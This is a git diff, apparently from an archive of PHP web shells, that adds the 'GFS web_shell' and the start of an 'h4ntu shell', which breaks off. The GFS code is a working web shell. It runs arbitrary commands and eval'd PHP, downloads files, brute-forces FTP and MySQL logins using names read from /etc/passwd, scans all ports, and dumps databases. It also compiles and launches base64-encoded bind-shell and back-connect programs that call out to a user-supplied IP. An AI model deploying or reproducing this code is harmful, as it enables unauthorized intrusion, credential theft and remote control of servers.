+    $res= "Can't select database";
+  mysql_close($db);
+  }else
+   $res="Can't connect to mysql server";
+ return $res;
+}
+function portscan($host)
+{
+ global $port;
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center>Host:  </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>";
+ for($i=1; $i<=65535; $i++){
+  $fp=fsockopen($host, $i, $errno, $errstr, 4);
+  if($fp){
+   fclose($fp);
+   if(isset($port[$i])){
+    $k=$port[$i];
+   }else
+    $k=getservbyport($i, "TCP");
+   if($k==""){$k="N\A";}
+   echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>";
+   echo "</tr>";
+  }
+ }
+ echo "</table>";
+}
+function pwd_conwert()
+{
+ $res="";
+ if(file_exists("/etc/passwd")){
+  $input=implode(file("/etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }else{
+  $input=implode(ex("cat /etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }
+ return $res;
+}
+function brute($type,$type2,$host,$file)
+{
+ if($type2=="login:login"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, $v)){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,$v);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:empty"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, "")){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,"");
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:number"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     for($j=0; $j<=999; $j++){
+      if (ftp_login($conn_id, $v, "$j")){
+       echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     for($j=0; $j<=999; $j++){
+      $conn_id=mysql_connect($host,$v,"$j");
+      if($conn_id){
+        echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+       }
+       mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:nigol"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, strrev($v))){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,strrev($v));
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=ftp_connect($host);
+      if(!$conn_id){ die("Coud not connect");}
+      if (ftp_login($conn_id, $v, $lib[$kk])){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=mysql_connect($host,$v,$lib[$kk]);
+      if($conn_id){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="lib:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    $conn_id=ftp_connect($host);
+    if(!$conn_id){ die("Coud not connect");}
+    if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){
+     echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+    }
+    ftp_close($conn_id);
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    if($lib[$kk]!=""){
+     $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+  echo "</table>";
+  }
+ }
+}
+
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////////// ��� //////////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+echo $HTML;
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp;",15));
+echo "GFS web_shell ver 3.1.7 </b></font>";
+echo "<hr size=3 color=black>";
+sysinfo();
+echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+echo "<table BORDER=1 align=center>";
+if($r_act=="nav" OR $r_act==NULL){
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+}else
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+if(!$safe_mode){
+ if($r_act=="bind"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+}
+
+if(function_exists(fsockopen)){
+ if($r_act=="port"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+}
+if($r_act=="brute"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+if($r_act=="eval"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>";
+################## ACTION ######################################################
+if($r_act=="nav" OR $r_act==NULL){
+ $box=$_POST['box'];
+ if($_POST['b_save']){
+  $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']);
+ }elseif($_POST['b_new_file']){
+  open_file($_POST['new'],"wb",$_POST['dname']);
+ }elseif($_POST['b_open_file']){
+  open_file($_POST['fname'],"r",$_POST['dname']);
+ }elseif($_POST['b_mail']){
+  $res="Function under construction!!!!!!!!!";
+ }elseif($_POST['b_run']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex($_POST['cmd']);
+ }elseif($_POST['b_f_file']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex("whereis ".$_POST['ffile']);
+ }elseif($_POST['b_upload']){
+  $s="Uploading file ".$_POST['lfilename']." use the ".$box;
+  $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']);
+ }elseif($_POST['b_mydb']){                              //������� ������ ��
+  $s="show_exists_db";
+  $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif ($_POST['b_runsql']){                           //��������� SQL ������
+  $s="SQL: ".$sql;
+  $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_base']){                              //������� ������ ������
+  $s="show_exists_tables";
+  $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_table']){                             //������� ���� �������
+  $s="Dump of ".$_POST['tablename'];
+  $tablename=$_POST['tablename'];
+  if ($tablename!=""){
+   $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  }else
+   $res="Select table!";
+ }elseif($_POST['b_safe_fuck']){                        //����� ����������� ������
+  $s="Open file ".$sfilename." with MySQL:";
+  $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']);
+ }elseif($_POST['b_dfilename']){                        //����� ����������� ������
+  $s="Dump in ".$dfilename." from ".$_POST['tablename'].":";
+  $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }
+ if ($host=="") {$host="localhost";}
+ if(isset($res)){
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo $res;
+  echo "</textarea></td></tr></table>";
+ }
+################## EXECUTE #####################################################
+ if(!$safe_mode){
+  $dir=getcwd();
+  echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+  echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+  echo "<table BORDER=1 align=center>";
+  echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Run command: </b></td></tr><font size=-2>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>";
+  echo "</tr></table></form>";
+ }
+ echo "<hr size=3 color=black>";
+#################### UPLOAD ####################################################
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Upload files: </b></td></tr><font size=-2>";
+ if ($box==""){ $box="fopen";}
+ echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">");
+ echo("<OPTION>$box</option>");
+ echo("<OPTION value=\"PC\">PC</option>
+       <option value=\"WGET\">WGET</option><option value=\"FETCH\">
+       FETCH</option><option value=\"LYNX\">LYNX</option>
+       <option value=\"cURL\">cURL</option>
+       <option value=\"fopen\">fopen</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>";
+ echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\"
+      size=30  value=\"$tfilename\"></td></tr>";
+ echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>";
+ echo "<hr size=3 color=black>";
+##################### MySQL ####################################################
+ if(isset($_POST['host'])){
+  $host=$_POST['host'];
+ }
+ if(isset($_POST['dbname'])){
+  $dbname=$_POST['dbname'];
+ }
+ if(isset($_POST['tablename'])){
+  $tablename=$_POST['tablename'];
+ }
+ if(isset($_POST['sql'])){
+  $sql=$_POST['sql'];
+ }
+ if(isset($_POST['sfilename'])){
+  $filename=$_POST['sfilename'];
+ }
+ if(isset($_POST['dfilename'])){
+  $dfilename=$_POST['dfilename'];
+ }
+ if(isset($_POST['username'])){
+  $username=$_POST['username'];
+ }
+ if(isset($_POST['pass'])){
+  $pass=$_POST['pass'];
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b>Host name:</b></td>";
+ echo "<td alling=\"center\"><b>DB name:</b></td>";
+ echo "<td alling=\"center\"><b>Table name:</b></td>";
+ echo "<td alling=\"center\"><b>SQL command: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>User name:</b></tb>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>Pass: </b></td>";
+ if ($safe_mode){
+  echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>");
+ if ($safe_mode){
+  echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>");
+ if ($safe_mode){
+  echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>");
+ }else
+  echo "<td alling=\"center\"></td>";
+ echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>");
+ echo "</tr></table></font></font>";
+ echo "<hr size=3 color=black>";
+################## NAVIGATION ##################################################
+ list_dir();
+}
+##################### PortScan #################################################
+if($r_act=="port"){
+ if($_POST['host']==""){
+  $host="localhost";
+ }else
+  $host=$_POST['host'];
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Scan host: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>";
+ echo "</tr></table></form>";
+ if($_POST['b_scan']){
+  portscan($host);
+ }
+}
+##################### PortBind #################################################
+if($r_act=="bind"){
+ if($_POST['b_bind']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc /var/tmp/gfs.c");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/a.out ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep a.out");
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep gfs.pl");
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_connect']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_proxy']){
+  save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd());
+  ex("perl /var/tmp/gfs.pl");
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>Proxy</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo ex("ps -aux | grep gfs.pl");
+  echo "</textarea></td></tr></table>";
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>BindPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Back connect: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>";
+ echo "</tr></table></form>";
+}
+##################### Brute ####################################################
+if($r_act=="brute"){
+ if(isset($_POST['brute_host'])){
+  $host=$_POST['brute_host'];
+ }else
+  $host="localhost";
+ if(isset($_POST['lib'])){
+  $lib=$_POST['lib'];
+ }else
+  $lib="  [library]";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Brute: </b></td></tr><font size=-2>";
+ echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>";
+ echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">");
+ echo("<option value=\"login:login\">login:login</option>
+       <option value=\"login:nigol\">login:nigol</option>
+       <option value=\"login:empty\">login:empty</option>
+       <option value=\"login:number\">login:number</option>");
+ if(function_exists(fopen)){
+  echo "<option value=\"login:lib\">login:lib</option>";
+  echo "<option value=\"lib:lib\">lib:lib</option>";
+ }
+ echo ("</select></td></tr>");
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"mysql\">mysql</option>
+       <option value=\"ftp\">ftp</option>");
+// if(function_exists(ssh2_connect)){
+//  echo "<option value=\"ssh\">ssh</option>";
+// }
+ echo ("</select></td>");
+ echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>");
+ if(function_exists(fopen)){
+  echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">";
+ }
+ echo ("</table></form>");
+ if($_POST['b_brute']){
+  brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']);
+ }
+}
+#################### Eval ######################################################
+if($r_act=="eval"){
+ if($_POST['b_eval']){
+  $eval=str_replace("<?","",$_POST['php_eval']);
+  $eval=str_replace("?>","",$eval);
+  eval($eval);
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
+ echo "</tr></table></form>";
+}
+
+echo "<hr size=3 color=black>";
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp",15));
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/xakep-shells/PHP/h4ntu shell [powered by tsoi].txt b/xakep-shells/PHP/h4ntu shell [powered by tsoi].txt
new file mode 100644
index 0000000..eb61f3d
--- /dev/null
+++ b/xakep-shells/PHP/h4ntu shell [powered by tsoi].txt	
@@ -0,0 +1,78 @@
+<title>h4ntu shell [powered by tsoi]</title>
+<?php
+echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
+?>
+
+<?php
+  closelog( );
+  $user = get_current_user( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $ver = phpversion( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+  if(!$whoami)$whoami=exec("whoami");
+?>
+<meta name="generator" content="Namo WebEditor v5.0">
+<br>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
+  </TR>
+  <TR>
